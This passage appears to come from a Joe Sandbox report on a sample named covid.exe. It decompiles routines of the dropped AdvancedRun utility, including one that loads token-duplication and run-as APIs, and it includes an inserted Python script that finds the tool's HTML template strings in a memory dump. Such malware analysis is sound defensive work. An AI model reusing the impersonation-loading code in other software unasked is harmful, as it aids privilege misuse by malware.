                                                                  							}
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  				goto L9;
                                                                  			}

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                  • API String ID: 667068680-3953557276
                                                                  • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                  • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                  • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                  • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 56%
                                                                  			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
                                                                  				void _v514;
                                                                  				char _v516;
                                                                  				void _v1026;
                                                                  				char _v1028;
                                                                  				void _v1538;
                                                                  				char _v1540;
                                                                  				void* _t39;
                                                                  				intOrPtr* _t50;
                                                                  				void* _t61;
                                                                  
                                                                  				_t50 = __ecx;
                                                                  				_push(0x1fe);
                                                                  				_push(0);
                                                                  				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                                  					_v1540 = 0;
                                                                  					memset( &_v1538, ??, ??);
                                                                  					_v1028 = 0;
                                                                  					memset( &_v1026, 0, 0x1fe);
                                                                  					_v516 = 0;
                                                                  					memset( &_v514, 0, 0x1fe);
                                                                  					L0040B1EC();
                                                                  					 *((long long*)(_t61 + 0x2c)) = _a16;
                                                                  					L0040B1EC();
                                                                  					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
                                                                  					if (_t39 != 0) goto L3;
                                                                  					return _t39;
                                                                  				}
                                                                  				_v516 = 0;
                                                                  				memset( &_v514, ??, ??);
                                                                  				_v1028 = 0;
                                                                  				memset( &_v1026, 0, 0x1fe);
                                                                  				L0040B1EC();
                                                                  				 *((long long*)(_t61 + 0x20)) =  *_a12;
                                                                  				L0040B1EC();
                                                                  				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
                                                                  			}

Instruction addresses for the listing above (listing order): 0x00409faf 0x00409fb4 0x00409fb5 0x00409fb6 0x0040a043 0x0040a04a 0x0040a058 0x0040a05f 0x0040a06d 0x0040a074 0x0040a08e 0x0040a099 0x0040a0ab 0x0040a0c9 0x0040a0ce 0x00000000 0x0040a0ce 0x00409fc3 0x00409fca 0x00409fd8 0x00409fdf 0x00409ff9 0x0040a006 0x0040a018 0x00000000

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$_snwprintf
                                                                  • String ID: %%0.%df
                                                                  • API String ID: 3473751417-763548558
                                                                  • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                  • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                  • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                  • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 51%
                                                                  			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
                                                                  				void _v8202;
                                                                  				short _v8204;
                                                                  				void* _t27;
                                                                  				short _t29;
                                                                  				short _t40;
                                                                  				void* _t41;
                                                                  				struct HMENU__* _t43;
                                                                  				short _t50;
                                                                  				void* _t52;
                                                                  				struct HMENU__* _t59;
                                                                  
                                                                  				E0040B550(0x2008, __ecx);
                                                                  				_t65 = _a8 - 4;
                                                                  				if(_a8 != 4) {
                                                                  					__eflags = _a8 - 5;
                                                                  					if(_a8 == 5) {
                                                                  						_t50 =  *0x40fe2c; // 0x0
                                                                  						__eflags = _t50;
                                                                  						if(_t50 == 0) {
                                                                  							L8:
                                                                  							_push(_a12);
                                                                  							_t27 = 5;
                                                                  							E00405E8D(_t27);
                                                                  							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
                                                                  							__eflags = _t29;
                                                                  							_a8 = _t29;
                                                                  							if(_t29 == 0) {
                                                                  								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
                                                                  							}
                                                                  							_v8204 = 0;
                                                                  							memset( &_v8202, 0, 0x2000);
                                                                  							GetWindowTextW(_a8,  &_v8204, 0x1000);
                                                                  							__eflags = _v8204;
                                                                  							if(__eflags != 0) {
                                                                  								E00405FAC(__eflags, L"caption",  &_v8204, 0);
                                                                  							}
                                                                  							EnumChildWindows(_a8, E0040614F, 0);
                                                                  							DestroyWindow(_a8);
                                                                  						} else {
                                                                  							while(1) {
                                                                  								_t40 =  *_t50;
                                                                  								__eflags = _t40;
                                                                  								if(_t40 == 0) {
                                                                  									goto L8;
                                                                  								}
                                                                  								__eflags = _t40 - _a12;
                                                                  								if(_t40 != _a12) {
                                                                  									_t50 = _t50 + 4;
                                                                  									__eflags = _t50;
                                                                  									continue;
                                                                  								}
                                                                  								goto L13;
                                                                  							}
                                                                  							goto L8;
                                                                  						}
                                                                  					}
                                                                  				} else {
                                                                  					_push(_a12);
                                                                  					_t41 = 4;
                                                                  					E00405E8D(_t41);
                                                                  					_pop(_t52);
                                                                  					_t43 = LoadMenuW(_a4, _a12);
                                                                  					 *0x40fe20 =  *0x40fe20 & 0x00000000;
                                                                  					_t59 = _t43;
                                                                  					_push(1);
                                                                  					_push(_t59);
                                                                  					_push(_a12);
                                                                  					E0040605E(_t52, _t65);
                                                                  					DestroyMenu(_t59);
                                                                  				}
                                                                  				L13:
                                                                  				return 1;
                                                                  			}

Instruction addresses for the listing above (listing order): 0x00406216 0x0040621b 0x00406222 0x0040625f 0x00406263 0x00406269 0x00406271 0x00406273 0x00406289 0x00406289 0x0040628e 0x0040628f 0x004062a9 0x004062ab 0x004062ad 0x004062b0 0x004062c3 0x004062c3 0x004062d3 0x004062da 0x004062f1 0x004062f7 0x004062fe 0x0040630d 0x00406312 0x0040631e 0x00406327 0x00406275 0x00406283 0x00406283 0x00406285 0x00406287 0x00000000 0x00000000 0x00406277 0x0040627a 0x00406280 0x00406280 0x00000000 0x00406280 0x00000000 0x0040627a 0x00000000 0x00406283 0x00406273 0x00406224 0x00406224 0x00406229 0x0040622a 0x0040622f 0x00406236 0x0040623c 0x00406243 0x00406245 0x00406247 0x00406248 0x0040624b 0x00406254 0x00406254 0x0040632d 0x00406334

                                                                  APIs
                                                                  • LoadMenuW.USER32 ref: 00406236
                                                                    • Part of subcall function 0040605E: GetMenuItemCount.USER32(?), ref: 00406074
                                                                    • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                    • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                    • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                  • DestroyMenu.USER32(00000000), ref: 00406254
                                                                  • CreateDialogParamW.USER32 ref: 004062A9
                                                                  • GetDesktopWindow.USER32 ref: 004062B4
                                                                  • CreateDialogParamW.USER32 ref: 004062C1
                                                                  • memset.MSVCRT ref: 004062DA
                                                                  • GetWindowTextW.USER32 ref: 004062F1
                                                                  • EnumChildWindows.USER32 ref: 0040631E
                                                                  • DestroyWindow.USER32(00000005), ref: 00406327
                                                                    • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                  • String ID: caption
                                                                  • API String ID: 973020956-4135340389
                                                                  • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                  • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                  • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                  • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 65%
                                                                  			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                  				void _v2050;
                                                                  				char _v2052;
                                                                  				void _v4098;
                                                                  				long _v4100;
                                                                  				void _v6146;
                                                                  				char _v6148;
                                                                  				void* __esi;
                                                                  				void* _t43;
                                                                  				intOrPtr* _t49;
                                                                  				intOrPtr* _t57;
                                                                  				void* _t58;
                                                                  				void* _t59;
                                                                  				intOrPtr _t62;
                                                                  				intOrPtr _t63;
                                                                  
                                                                  				_t49 = __ecx;
                                                                  				E0040B550(0x1800, __ecx);
                                                                  				_t57 = _t49;
                                                                  				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
                                                                  				_v4100 = 0;
                                                                  				memset( &_v4098, 0, 0x7fe);
                                                                  				_v2052 = 0;
                                                                  				memset( &_v2050, 0, 0x7fe);
                                                                  				_v6148 = 0;
                                                                  				memset( &_v6146, 0, 0x7fe);
                                                                  				_t59 = _t58 + 0x24;
                                                                  				_t62 =  *0x40fe30; // 0x0
                                                                  				if(_t62 != 0) {
                                                                  					_push(0x40fe30);
                                                                  					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
                                                                  					_push(0x400);
                                                                  					_push( &_v2052);
                                                                  					L0040B1EC();
                                                                  					_t59 = _t59 + 0x10;
                                                                  				}
                                                                  				_t63 =  *0x40fe28; // 0x0
                                                                  				if(_t63 != 0) {
                                                                  					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
                                                                  				}
                                                                  				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
                                                                  				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
                                                                  				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
                                                                  				_push(0x400);
                                                                  				_push( &_v6148);
                                                                  				L0040B1EC();
                                                                  				_t43 = E00407343(_t57, _a4,  &_v6148);
                                                                  				_t64 = _a8 - 5;
                                                                  				if(_a8 == 5) {
                                                                  					return E00407D03(_t57, _t64, _a4);
                                                                  				}
                                                                  				return _t43;
                                                                  			}

Instruction addresses for the listing above (listing order): 0x004081e4 0x004081ec 0x004081fc 0x00408200 0x00408215 0x0040821c 0x0040822a 0x00408231 0x0040823f 0x00408246 0x0040824b 0x0040824e 0x0040825a 0x0040825c 0x00408261 0x0040826c 0x0040826d 0x0040826e 0x00408273 0x00408273 0x00408276 0x0040827c 0x0040828a 0x00408290 0x004082ab 0x004082c5 0x004082c6 0x004082d1 0x004082d2 0x004082d3 0x004082e7 0x004082ec 0x004082f0 0x00000000 0x004082f5 0x004082fe

                                                                  APIs
                                                                  Strings
                                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                  • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$_snwprintf$wcscpy
                                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                  • API String ID: 1283228442-2366825230
                                                                  • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                  • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                  • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                  • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%
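The routine E004081E4 above is recognisable purely by the four wide-string templates it hands to _snwprintf and wcscpy (the HTML 3.2 DOCTYPE, the charset meta tag, the RTL table opener and the footer linking to http://www.nirsoft.net/). When a sample drops a renamed copy of such a tool, those literals in the .rdata dump are the quickest way to confirm what the dropped component is, independent of the file name (here the snapshot is labelled AdvancedRun while the submitted file is covid.exe). The script below is an added triage example for this report, not code from the sample or from NirSoft: it pulls printable UTF-16LE runs out of a dump buffer the way `strings -el` would, looks for the exact template literals, and converts each hit offset to a virtual address. It assumes the scanned region begins at 0x40C000, the start address encoded in the name of the associated .rdata dump listed above; the buffer it scans is constructed for the demo, not the real dump.

```python
"""
Added example for this analysis page (not code from the sample or from NirSoft):
find the UTF-16LE template literals used by the decompiled routine E004081E4 in
a raw memory-dump buffer and map each hit back to a virtual address.

Assumptions: the dump region is treated as starting at 0x40C000 (taken from the
associated dump name "...000000000040C000.00000002.00020000.sdmp"); the buffer
scanned below is CONSTRUCTED for the demo and is not the real dump.
"""
import re
from typing import Dict, List, Tuple

# Wide-string literals copied from the Strings list of E004081E4.
REPORT_TEMPLATE_STRINGS = (
    '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\r\n',
    "<meta http-equiv='content-type' content='text/html;charset=%s'>",
    '<table dir="rtl"><tr><td>\r\n',
    '<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>',
)

RDATA_BASE = 0x40C000  # start VA of the .rdata dump, from its file name above


def build_demo_dump(pad: int = 0x200) -> bytes:
    """CONSTRUCTED stand-in for an .rdata dump: NUL padding, then the four
    template literals back to back with wide NUL terminators, then filler."""
    out = bytearray(b"\x00" * pad)
    for s in REPORT_TEMPLATE_STRINGS:
        out += s.encode("utf-16-le") + b"\x00\x00"
    out += b"\xcc" * 64
    return bytes(out)


def extract_wide_strings(buf: bytes, min_len: int = 8,
                         base: int = RDATA_BASE) -> List[Tuple[int, str]]:
    """Minimal `strings -el`: each run of >= min_len printable ASCII characters
    encoded as UTF-16LE (byte, NUL, byte, NUL, ...), as (virtual_address, text)."""
    pat = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [(base + m.start(), m.group().decode("utf-16-le"))
            for m in pat.finditer(buf)]


def find_template_hits(buf: bytes, base: int = RDATA_BASE) -> Dict[str, List[int]]:
    """Map each known template literal to every virtual address at which its
    UTF-16LE encoding occurs in buf; literals that are absent are omitted."""
    hits: Dict[str, List[int]] = {}
    for s in REPORT_TEMPLATE_STRINGS:
        needle = re.escape(s.encode("utf-16-le"))
        addrs = [base + m.start() for m in re.finditer(needle, buf)]
        if addrs:
            hits[s] = addrs
    return hits


def classify(hits: Dict[str, List[int]]) -> str:
    """Triage verdict: all four literals together are the report header that
    E004081E4 emits; a subset is reported as a partial match."""
    total = len(REPORT_TEMPLATE_STRINGS)
    if len(hits) == total:
        return "nirsoft-style HTML report template (matches E004081E4)"
    if hits:
        return "partial template match (%d of %d literals)" % (len(hits), total)
    return "no template literals found"


if __name__ == "__main__":
    dump = build_demo_dump()
    for va, text in extract_wide_strings(dump):
        print("0x%08x  %s" % (va, text))
    found = find_template_hits(dump)
    for literal, addrs in found.items():
        print(", ".join("0x%08x" % a for a in addrs), repr(literal))
    print(classify(found))
```

Against a real Joe Sandbox dump, read the .sdmp file as bytes and pass the start address from its file name as `base`; the printed virtual addresses can then be compared with the operands in the listing (for instance the string pointer 0x40c4e8 that the first routine on this page passes to _snwprintf).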

                                                                  C-Code - Quality: 85%
                                                                  			E0040920A(wchar_t* __edi, wchar_t* __esi) {
                                                                  				void _v526;
                                                                  				long _v528;
                                                                  				wchar_t* _t17;
                                                                  				signed int _t40;
                                                                  				wchar_t* _t50;
                                                                  
                                                                  				_t50 = __edi;
                                                                  				if(__esi[0] != 0x3a) {
                                                                  					_t17 = wcschr( &(__esi[1]), 0x3a);
                                                                  					if(_t17 == 0) {
                                                                  						_t40 = E0040488D(__esi, L"\\systemroot");
                                                                  						if(_t40 < 0) {
                                                                  							if( *__esi != 0x5c) {
                                                                  								wcscpy(__edi, __esi);
                                                                  							} else {
                                                                  								_v528 = 0;
                                                                  								memset( &_v526, 0, 0x208);
                                                                  								E00404C08( &_v528);
                                                                  								memcpy(__edi,  &_v528, 4);
                                                                  								__edi[1] = __edi[1] & 0x00000000;
                                                                  								wcscat(__edi, __esi);
                                                                  							}
                                                                  						} else {
                                                                  							_v528 = 0;
                                                                  							memset( &_v526, 0, 0x208);
                                                                  							E00404C08( &_v528);
                                                                  							wcscpy(__edi,  &_v528);
                                                                  							wcscat(__edi, __esi + 0x16 + _t40 * 2);
                                                                  						}
                                                                  						L11:
                                                                  						return _t50;
                                                                  					}
                                                                  					_push( &(_t17[0]));
                                                                  					L4:
                                                                  					wcscpy(_t50, ??);
                                                                  					goto L11;
                                                                  				}
                                                                  				_push(__esi);
                                                                  				goto L4;
                                                                  			}
                                                                  0x0040920a
                                                                  0x00409218
                                                                  0x00409223
                                                                  0x0040922c
                                                                  0x0040924b
                                                                  0x00409253
                                                                  0x0040929b
                                                                  0x004092e4
                                                                  0x0040929d
                                                                  0x004092a3
                                                                  0x004092b1
                                                                  0x004092bd
                                                                  0x004092cc
                                                                  0x004092d1
                                                                  0x004092d8
                                                                  0x004092dd
                                                                  0x00409255
                                                                  0x0040925b
                                                                  0x00409269
                                                                  0x00409275
                                                                  0x00409282
                                                                  0x0040928d
                                                                  0x00409292
                                                                  0x004092ec
                                                                  0x004092ef
                                                                  0x004092ef
                                                                  0x00409231
                                                                  0x00409232
                                                                  0x00409233
                                                                  0x00000000
                                                                  0x00409239
                                                                  0x0040921a
                                                                  0x00000000

                                                                  APIs
                                                                  • wcschr.MSVCRT ref: 00409223
                                                                  • wcscpy.MSVCRT ref: 00409233
                                                                    • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                    • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                    • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                  • wcscpy.MSVCRT ref: 00409282
                                                                  • wcscat.MSVCRT ref: 0040928D
                                                                  • memset.MSVCRT ref: 00409269
                                                                    • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                    • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                  • memset.MSVCRT ref: 004092B1
                                                                  • memcpy.MSVCRT ref: 004092CC
                                                                  • wcscat.MSVCRT ref: 004092D8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                  • String ID: \systemroot
                                                                  • API String ID: 4173585201-1821301763
                                                                  • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                  • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                  • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                  • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 48%
                                                                  			E00409C70(signed int* _a4) {
                                                                  				signed int _v8;
                                                                  				_Unknown_base(*)()* _v12;
                                                                  				char* _v16;
                                                                  				int _v18;
                                                                  				signed int _v20;
                                                                  				char _v36;
                                                                  				intOrPtr* _t21;
                                                                  				struct HINSTANCE__* _t22;
                                                                  				signed int _t23;
                                                                  				signed int _t24;
                                                                  				_Unknown_base(*)()* _t26;
                                                                  				char* _t28;
                                                                  				int _t31;
                                                                  
                                                                  				_t21 = _a4;
                                                                  				if( *_t21 == 0) {
                                                                  					_t22 = GetModuleHandleW(L"kernel32.dll");
                                                                  					_v8 = _t22;
                                                                  					_t23 = GetProcAddress(_t22, "GetProcAddress");
                                                                  					 *_a4 = _t23;
                                                                  					_t24 = _t23 ^ _v8;
                                                                  					if((_t24 & 0xfff00000) != 0) {
                                                                  						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
                                                                  						_v20 = _v20 & 0x00000000;
                                                                  						_v12 = _t26;
                                                                  						asm("stosd");
                                                                  						asm("stosw");
                                                                  						asm("movsd");
                                                                  						asm("movsd");
                                                                  						asm("movsd");
                                                                  						asm("movsw");
                                                                  						_t28 =  &_v36;
                                                                  						asm("movsb");
                                                                  						_v16 = _t28;
                                                                  						_v20 = strlen(_t28);
                                                                  						_t31 = strlen( &_v36);
                                                                  						_v18 = _t31;
                                                                  						_t24 = _v12(_v8,  &_v20, 0, _a4);
                                                                  					}
                                                                  					return _t24;
                                                                  				}
                                                                  				return _t21;
                                                                  			}
                                                                  0x00409c73
                                                                  0x00409c7c
                                                                  0x00409c90
                                                                  0x00409c9f
                                                                  0x00409ca2
                                                                  0x00409ca7
                                                                  0x00409ca9
                                                                  0x00409cb1
                                                                  0x00409cc0
                                                                  0x00409cc2
                                                                  0x00409cc7
                                                                  0x00409ccf
                                                                  0x00409cd0
                                                                  0x00409cd7
                                                                  0x00409cd8
                                                                  0x00409cd9
                                                                  0x00409cda
                                                                  0x00409cdc
                                                                  0x00409ce0
                                                                  0x00409ce1
                                                                  0x00409ce9
                                                                  0x00409cf1
                                                                  0x00409cfb
                                                                  0x00409d08
                                                                  0x00409d08
                                                                  0x00000000
                                                                  0x00409d0d
                                                                  0x00409d0f

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                  • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                  • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                  • strlen.MSVCRT ref: 00409CE4
                                                                  • strlen.MSVCRT ref: 00409CF1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProcstrlen
                                                                  • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                  • API String ID: 1027343248-2054640941
                                                                  • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                  • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                  • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                  • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E0040289F(intOrPtr* __esi) {
                                                                  				void* _t9;
                                                                  				struct HINSTANCE__* _t10;
                                                                  				_Unknown_base(*)()* _t14;
                                                                  
                                                                  				if( *(__esi + 0x10) == 0) {
                                                                  					_t10 = LoadLibraryW(L"advapi32.dll");
                                                                  					 *(__esi + 0x10) = _t10;
                                                                  					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
                                                                  					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
                                                                  					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
                                                                  					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
                                                                  					 *(__esi + 8) = _t14;
                                                                  					return _t14;
                                                                  				}
                                                                  				return _t9;
                                                                  			}
                                                                  0x004028a3
                                                                  0x004028ab
                                                                  0x004028bd
                                                                  0x004028ca
                                                                  0x004028d7
                                                                  0x004028e3
                                                                  0x004028e6
                                                                  0x004028e8
                                                                  0x00000000
                                                                  0x004028eb
                                                                  0x004028ec

                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                  • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                  • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                  • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                  • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                  Strings
                                                                  Memory Dump Source
